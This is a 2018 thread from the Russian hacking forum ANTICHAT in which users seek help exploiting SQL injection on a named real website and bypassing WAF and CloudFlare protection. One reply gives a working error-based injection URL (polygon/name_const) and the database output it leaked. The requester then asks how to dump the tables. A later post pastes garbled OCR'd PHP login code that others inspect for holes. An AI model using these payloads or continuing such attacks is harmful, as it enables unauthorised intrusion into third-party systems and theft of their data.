ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.08.2018, 18:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 36068
Репутация:
0
|
|
это же просто detect WAF'a. Чем тут поможет обойти?
|
|
|
|

26.08.2018, 18:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от vikler
vikler said:
↑
это же просто detect WAF'a. Чем тут поможет обойти?
это разве не тампер ?
бля рили детект я нашёл думал тампер )
ггг сорян
|
|
|
|

26.08.2018, 21:31
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Подскажите как раскручивать sql-inj в таких ситуациях:
1) cPanel глушит почти что всё в 403-ию ошибку (HTTP Error 403 - Forbidden)
metroeyesng.com/?/product/online_store/&prd_id=11 (Параметр prd_id)
2) Есть ли в настоящий момент "действующие" tamper'ы sqlmap'a для обхода CloudFlare? (PS: выяснять реальный ip не подходит)
Или хотя бы рабочий пример какой-нибудь(
|
|
|

26.08.2018, 22:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 70303
Репутация:
145
|
|
Код:
Code:
http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-
Код:
Code:
Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'
|
|
|
|

27.08.2018, 06:10
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Сообщение от joelblack
joelblack said:
↑
Код:
Code:
http://metroeyesng.com/?/product/online_store/&prd_id=11'AND+polygon((select*from(select name_const(version(),1))x))+--+-
Код:
Code:
Illegal non geometric '(select `x`.`5.5.55-38.8-log` from (select NAME_CONST(version(),1) AS `5.5.55-38.8-log`) `x`)' value found during parsing
SELECT * FROM mc_product WHERE prd_store='online_store' AND prd_id='11'AND polygon((select*from(select name_const(version(),1))x)) -- -'
А не подскажите как в таких ситуациях выводить БД/таблицы? А то пробовал и в hex загонять не выходит (толи руки не оттуда(( )
|
|
|

27.08.2018, 06:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 47768
Репутация:
119
|
|
joelblack,в чем смысл давать вектор с name_const? Тем более новичку.
|
|
|
|

28.08.2018, 16:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Есть тут уязвимость?

|
|
|
|

28.08.2018, 16:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 47768
Репутация:
119
|
|
Лол, плайнтекстом никак?
И смысл вырезать все "опасные" символы, когда mysql_real_escape_string() наше все? Дальше этот колхоз в виде картинки разглядывать не стал.
|
|
|
|

28.08.2018, 17:48
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
Сообщение от Gorbachev
Gorbachev said:
↑
Лол, плайнтекстом никак?
И смысл вырезать все "опасные" символы, когда mysql_real_escape_string() наше все? Дальше этот колхоз в виде картинки разглядывать не стал.
От избытка свободного времени))) Прогнал его картинку в FineReader'e, для удобства других пользователей) Надеюсь без ошибок (разрешение картинки маловато...))
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] *[/COLOR][COLOR="#0000BB"]©copyright Copyright[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]2016[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]Webmaster Studio[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]https[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.webmaster.md [/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]©version 3.0 Date[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2016[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]06[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]04 [/COLOR][COLOR="#007700"]* @[/COLOR][COLOR="#0000BB"]link[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]ws[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]lock[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php ?> '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ar_define_langterms'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'MSG_ADMIN_WRONG_AUTH_DATA'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; } else { [/COLOR][COLOR="#0000BB"]$us_data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]); if([/COLOR][COLOR="#0000BB"]$us_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'block'[/COLOR][COLOR="#007700"]] ) { [/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'auth_error'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ar_define_langterms'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'MSG_ADMIM_IS_BLOCKED'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; } else { [/COLOR][COLOR="#FF8000"]// запоминаем пользователя. [/COLOR][COLOR="#0000BB"]$login_crypt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]crypt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Slogin[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]$res_mem[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE ws_users SET login_crypt='[/COLOR][COLOR="#0000BB"]$login_crypt[/COLOR][COLOR="#DD0000"]', 'auth_date' = NOW() WHERE login='[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mem'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$login_crypt[/COLOR][COLOR="#007700"]; [/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'image'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$us_data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'image'[/COLOR][COLOR="#007700"]]; } }
}else{ [/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'auth_error'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ar_define_langterms'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'MSG_ADMIN_BAD_CAPTCHA'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; } }
unset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'captcha_keystring'[/COLOR][COLOR="#007700"]]);
if([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]] ) [/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]]); else [/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: /ws/"[/COLOR][COLOR="#007700"]); [/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
|
|
|

28.08.2018, 18:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Да нормальная там кариинка!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|